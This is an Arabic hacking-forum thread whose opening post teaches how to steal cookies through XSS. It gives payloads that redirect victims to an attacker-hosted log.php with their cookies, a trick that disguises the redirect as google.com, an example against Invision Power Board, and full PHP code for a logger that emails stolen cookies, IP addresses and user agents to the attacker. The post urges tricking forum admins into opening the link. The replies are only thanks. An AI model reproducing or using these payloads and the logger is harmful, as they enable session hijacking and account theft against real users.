اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

الدرس السابع استغلال ثغرة xss

الدرس السابع استغلال ثغرة xss


صفحة 1 من 3 123 الأخيرةالأخيرة
النتائج 1 إلى 10 من 26

الموضوع: الدرس السابع استغلال ثغرة xss

  1. #1
    محظور Array
    تاريخ التسجيل
    Sep 2010
    الدولة
    under net
    المشاركات
    1,775

    aljyyosh الدرس السابع استغلال ثغرة xss



    بسم الله الرحمان الرحيم
    كيفكم شباب اليوم معي شرح مبسط لثغرة XSS
    نتابع الشرح

    طيب نأتي الان الى الكود المهم في ثغرات xss
    هذا كود سكربت خبيث يأتي بمعلومات الكوكيز تجده دائما ً في ثغرات xss
    كود PHP:
    **********javascript:alert(document.******)</Script> 
    الأن الكود هذا لم يكون بالثغره سوف يظهر لك الكوكيز تبعك وهو يحتوي على نقاط مهمه وهي :
    1- رقم العضويه
    2- الباسورد مشفر md5
    3 - الباسورد مشفر Hash

    ورقم الاستايل وغيره ,, على حسب نوعيه البرنامج المصاب!

    طيب الحين وجدت هذا الكود سوف نربطه باللوج

    ماهو اللوج ؟
    اللوج هذا تربطه مع السكربت الذي ياتي بالكوكيز ,, وبعد ان تربطه كل من فتح السكربت وهو مربوط باللوج سوف يسجل معلومات الكوكيز تبعه باللوج او يرسل الى ايميلك ( على حسب اللوج )

    طيب الان بعد ما ربطته اصبح الرابط :

    كود PHP:
    **********location.href="http://www.xxxxx.com/log.php?id="+document.******</Script> 
    تمام الان :
    www.xxx.com = الموقع المربوط فيه اللوج
    log.php = اسم ملف اللوج
    طيب الحين نرفع اللوج على اي موقع عندك وبعد كذا تستبدل
    www.xxx.com/log.php برابط اللوج الي عندك

    المهم الان هذا السكربت اصبح جاهزا للاستعمال سوف نضعه بكود الثغره ونستبدل :

    كود PHP:
    **********javascript:alert(document.******)</Script> 
    بـ

    كود PHP:
    **********location.href="http://www.xxxxx.com/log.php?id="+document.******</Script> 
    الان نخلي مثلا المدير العام او اي عضو تبي تسرق الكوكيز تبعه انه يفتح الرابط

    بتقول كيف بقولك ياااولد انت وراااااسك عاد بطريقتك خليه يفتح الرابط

    طيب الحين بتقولي والله فضيحه يا pSyCh0 لو اخليه يفتح الرابط يطلع عنده اللوج وبيكشفني

    بقوله ولا يهمك اخوي نربطه كمان بموقع للتمويه

    مثلا نربطه بموقع www.google.com بحيث انه لم يفتح الثغره والمربوط فيها اللوج وموقع جوجل راح يتحول اوتوماتيك الى جوجل مبسط استغلال ثغرات (موضوع تطبيق وبكذا مايشك

    بتقول كيف يا pSyCh0 بقولك كذا نضع بعد رابط اللوج :
    re=www.google.com&
    بس مبسط استغلال ثغرات (موضوع تطبيق
    بحيث يكون بعد & يوجد id ... الخ
    يعني يكون الكود :

    كود PHP:
    **********location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+document.******</Script> 
    طبعا انت استبدل www.google.com باي موقع تبغاه ويفضل يكون الموقع الي مصاب فيه الثغره (1)

    طيب الحين تقول كذا تمام يا pSyCh0 يالله عطنا مثااال

    بعطيكم مثال لثغره :Invision Power Board

    الكود للثغره :
    http://xxx.com/forums/index.php?act=idx='>**********alert(document.***** *)</script>
    احنا راح نستبدل :

    كود PHP:
    **********javascript:alert(document.******)</Script> 
    بـ

    كود PHP:
    **********location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+document.******</Script> 
    واستبدل هنا موقع جوجل باي موقع تبغاه

    ورابط اللوج www.xxx.com/log.php باللوج تبعك

    ====================
    تطبيق :

    التطبيق هنا :

    كود PHP:
    http://www.test.com/forums/index.php?act=idx='>**********alert(document.******)</script> 
    اللوج :

    كود PHP:
    <?php
    // Thnx For Aljyyosh Team - [url]http://www.aljyyosh.com/[/url] - [url]http://www.aljyyosh.com//vb[/url]
    //----- S4a Logger v0.10 -----//
    // Star
    //Your Email --::--
    $ToGet "[email protected]";
    ////////////////////////////////
    $Ip $REMOTE_ADDR;
    $Sys $HTTP_USER_AGENT;
    //////////////////////////////////////////////
    if($ToGet == ''){echo 'Edit Your Email Befor You Use Me !!'; exit();}
    //
    $Time date("l dS of F Y h:i:s A");

    $Hdr 'From: Logger <[email protected]>';

    $Msg '
    Hi ,, Mr.Attacker :D
    -------------------------------------------
    - Thnx For Aljyyosh Team ,, For Aljyyosh Forum -
    ---------------------------------------------------------------------
    ---------------------------------------------------------------------
    - IP         ::- [ ' 
    .$Ip.'  ]
    - System     ::- [  '
    .$Sys.' ]
    - The ****** ::- [  '
    .$id.'  ]
    - Time       ::- [ '
    .$Time.' ]
    ---------------------------------------------------------------------
    [email protected] ~ ./evilcat /etc/passwd                              -
    [email protected] ~ ./s4acracker passwd --log <log.log> &&             -
    ---------------------------------------------------------------------
    '
    ;
    $send mail($ToGet,'S4a - [ New****** ]',$Msg,$Hdr);
    //
    /* &@#&@#&@#&@#&@#&@#&@# code ,, By pSyCh0_3D [  :D ] << v0.10 */ 
    if(isset($_GET["re"])){
    $&@
    #&@#&@#&@#&@#&@#&@# = $_GET["re"];
    if($&@#&@#&@#&@#&@#&@#&@# == ""){
    mail ($ToGet,'S4a - [Error]','&@#&@#&@#&@#&@#&@#&@# Is Set And Its Empty !!',$Hdr);
    }else{
    header("location:".$&@#&@#&@#&@#&@#&@#&@#);
    }
    }
    //
    ?>
    استبدل هنا :

    كود PHP:
    $ToGet "[email protected]"
    الايميل: [email protected]
    بالايميل تبعك !

    واحفظه بامتداد php طبعا افتح المفكره وحط الكود ولاتنسى تغير الايميل واحفظه بامتداد php
    وارفعه على موقعك



  2. #2
    هكر مجتهد Array الصورة الرمزية Hidden pain
    تاريخ التسجيل
    May 2010
    الدولة
    بلد المليون و نصف المليون شهيد
    المشاركات
    592

    افتراضي رد: الدرس السابع استغلال ثغرة xss

    شكرا لك
    من الافضل ان ترفق سكربت ال php احسن اخي


  3. #3
    هكر مبتديء Array
    تاريخ التسجيل
    Jun 2011
    المشاركات
    35

    افتراضي رد: الدرس السابع استغلال ثغرة xss

    مشكور وماقصرت يالغلا
    والله يعافيك
    تقبل مروري المتوآضع



  4. #4
    هكر مجتهد Array الصورة الرمزية HaCKer011
    تاريخ التسجيل
    Sep 2011
    المشاركات
    474

    افتراضي رد: الدرس السابع استغلال ثغرة xss

    مشكوووووور اخي تقبل مروري


  5. #5
    محظور Array
    تاريخ التسجيل
    Sep 2010
    الدولة
    under net
    المشاركات
    1,775

    افتراضي رد: الدرس السابع استغلال ثغرة xss

    منورين الموظوع


  6. #6
    هكر مبتديء Array
    تاريخ التسجيل
    Oct 2011
    المشاركات
    26

    افتراضي رد: الدرس السابع استغلال ثغرة xss

    مشكور وماقصرت يالغلا
    والله يعافيك
    تقبل مروري المتوآضع



  7. #7
    محظور Array
    تاريخ التسجيل
    Sep 2010
    الدولة
    under net
    المشاركات
    1,775

    افتراضي رد: الدرس السابع استغلال ثغرة xss

    منور حبيبي


  8. #8
    هكر مبتديء Array
    تاريخ التسجيل
    May 2010
    المشاركات
    3

    افتراضي رد: الدرس السابع استغلال ثغرة xss

    تتبغى الصراحة وربي اروع دوره شفتها
    يعطيك العافييه يا عسل
    همسة
    (
    يالييت لو تسوي شرح فديو وتطبق عشان توضح الطريقة )


  9. #9
    هكر مبتديء Array
    تاريخ التسجيل
    Sep 2010
    المشاركات
    49

    افتراضي رد: الدرس السابع استغلال ثغرة xss

    تقبل مروري



  10. #10
    هكر مبتديء Array
    تاريخ التسجيل
    Oct 2011
    المشاركات
    20

    افتراضي رد: الدرس السابع استغلال ثغرة xss

    يسلموووووووووووووووووا


صفحة 1 من 3 123 الأخيرةالأخيرة

المواضيع المتشابهه

  1. شرح استغلال ثغرة vBulletin 3.8.6
    بواسطة She!! Access في المنتدى قسم الثغرات
    مشاركات: 42
    آخر مشاركة: 04-09-2013, 04:50 PM
  2. الدرس السادس استغلال ثغرة upload shell
    بواسطة pSyCh0_3D في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 39
    آخر مشاركة: 08-20-2012, 09:24 PM
  3. الدرس السابع المصفوفات الترابطيه
    بواسطة ابو مشاري في المنتدى منتدى الإختراق العام
    مشاركات: 4
    آخر مشاركة: 01-23-2012, 02:30 AM
  4. استغلال ثغرة الاهدائات
    بواسطة HuNtEr2 في المنتدى قسم الثغرات
    مشاركات: 21
    آخر مشاركة: 11-10-2010, 02:44 AM

وجد الزوار هذه الصفحة بالبحث عن:

استغلال ثغرات xss

مواقع مصابة بثغرة xss

اكواد xss

دورة ثغرة xss

ثغرة xss

استغلال ثغرة xss

احتراف ثغرة xss

كود xssاستغلال xssxss aljyyoshxss ثغرةشرح استغلال ثغرة xssكيفية استغلال ثغرات xssثغرة Cross Site Scriptingاحتراف ثغره xsshttp:www.aljyyosh.comvbshowthread.phpt=28138 xss aljyyoshاحترف ثغرات xssدورة ثغرات xssشرح ثغرة Cross Site Scriptingشرح ثغرة xssaljyyosh xssشرح استغلال ثغرات xssاستغلال ثغرةxss دوره احتراف ثغرت xss

الكلمات الدلالية لهذا الموضوع

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •